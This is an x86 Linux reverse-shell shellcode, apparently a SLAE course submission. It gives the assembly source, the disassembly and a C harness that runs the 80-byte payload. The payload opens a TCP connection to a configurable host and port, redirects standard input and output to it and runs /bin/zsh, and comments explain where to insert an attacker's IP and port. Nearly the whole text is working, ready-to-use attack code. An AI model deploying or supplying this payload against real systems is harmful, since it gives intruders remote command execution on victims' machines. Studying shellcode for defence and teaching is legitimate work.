/*
;
; Linux x86
; Author: thryb
; Date: 21-07-16
; Purpose: Reverse /bin/zsh to TCP port 9090
; Size: 80 bytes
; ID: SLAE-770
; Git: https://www.github.com/thryb/SLAE-770
;
global _start
section .text
_start:
xor eax, eax ; cleaning registers
xor ebx, ebx
; 1 - create socket
; socket(AF_INET, SOCK_STREAM, 0);
; #define SYS_SOCKET 1 // sys_socket(2)
push eax ; null terminate
push byte 0x1 ; stack = 0, 1
push byte 0x2 ; stack = 0, 1, 2 (0, SOCK_STREAM, AF_INET)
mov al, 0x66 ; sys_socketcall = 102
mov bl, 0x1 ; socketcall() socket = 1
mov ecx, esp ; mv stack ptr into ecx
int 0x80 ; init
xchg esi, eax ; saving sockfd
; 2 - Connect
; connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
mov al, 0x66 ; sys_socketcall = 102
add ebx, 0x2 ; sys_connect = 3
push 0xefffff7f ; 127.255.255.254 (ip2shell.py)
push word 0x8223 ; 9090 (port2shell.py)
push word 0x2 ; 2 AF_INET
mov ecx, esp ; mv stack ptr to ecx
push 0x10 ; addr leght 16
push ecx ; ptr address
push esi ; fd
mov ecx, esp ; mv final stack ptr to ecx
int 0x80 ; init
xchg eax, esi ; save sockfd
; 3 - dup
; sys_dup2 = 63 = 0x3f
xor ecx, ecx ; NULL ecx
add cl, 0x2 ; add 2 to counter
dup2: ; STDIN, STDOUT, STDERR
mov al, 0x3f ; sys_dup2
int 0x80 ; init
dec cl ; decrement counter
jns dup2 ; Jump on No Sign (Positive)
; 4 - execve /bin/zsh
; normal execve shell exec
push eax ; null
push 0x68737a2f ; hsz/
push 0x6e69622f ; nib/
mov ebx, esp ; mv stack ptr to ebx
push eax ; null
push ebx ; push ptr addr
mov ecx, esp ; mv new stack ptr to ecx
mov al, 0xb ; sys_execve (11)
int 0x80 ; init
============================================================================================================
No NULL
./reverse-zsh-tcp-9090.bin: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 db xor %ebx,%ebx
8048064: 50 push %eax
8048065: 6a 01 push $0x1
8048067: 6a 02 push $0x2
8048069: b0 66 mov $0x66,%al
804806b: b3 01 mov $0x1,%bl
804806d: 89 e1 mov %esp,%ecx
804806f: cd 80 int $0x80
8048071: 96 xchg %eax,%esi
8048072: b0 66 mov $0x66,%al
8048074: 83 c3 02 add $0x2,%ebx
8048077: 68 7f ff ff ef push $0xefffff7f
804807c: 66 68 23 82 pushw $0x8223
8048080: 66 6a 02 pushw $0x2
8048083: 89 e1 mov %esp,%ecx
8048085: 6a 10 push $0x10
8048087: 51 push %ecx
8048088: 56 push %esi
8048089: 89 e1 mov %esp,%ecx
804808b: cd 80 int $0x80
804808d: 96 xchg %eax,%esi
804808e: 31 c9 xor %ecx,%ecx
8048090: 80 c1 02 add $0x2,%cl
08048093 <dup2>:
8048093: b0 3f mov $0x3f,%al
8048095: cd 80 int $0x80
8048097: fe c9 dec %cl
8048099: 79 f8 jns 8048093 <dup2>
804809b: 50 push %eax
804809c: 68 2f 7a 73 68 push $0x68737a2f
80480a1: 68 2f 62 69 6e push $0x6e69622f
80480a6: 89 e3 mov %esp,%ebx
80480a8: 50 push %eax
80480a9: 53 push %ebx
80480aa: 89 e1 mov %esp,%ecx
80480ac: b0 0b mov $0xb,%al
80480ae: cd 80 int $0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xdb\x50\x6a\x01\x6a\x02\xb0\x66\xb3\x01\x89\xe1\xcd\x80\x96\xb0\x66\x83\xc3\x02\x68"
// Replace IP here (use ip2shell.py to generate IP).
"\x7f\xff\xff\xef"
// *****************
"\x66\x68"
// Replace port here (use port2shell.py to generate IP).
"\x23\x82"
// *****************
"\x66\x6a\x02\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\x96\x31\xc9\x80\xc1\x02\xb0\x3f\xcd\x80\xfe\xc9\x79\xf8\x50\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
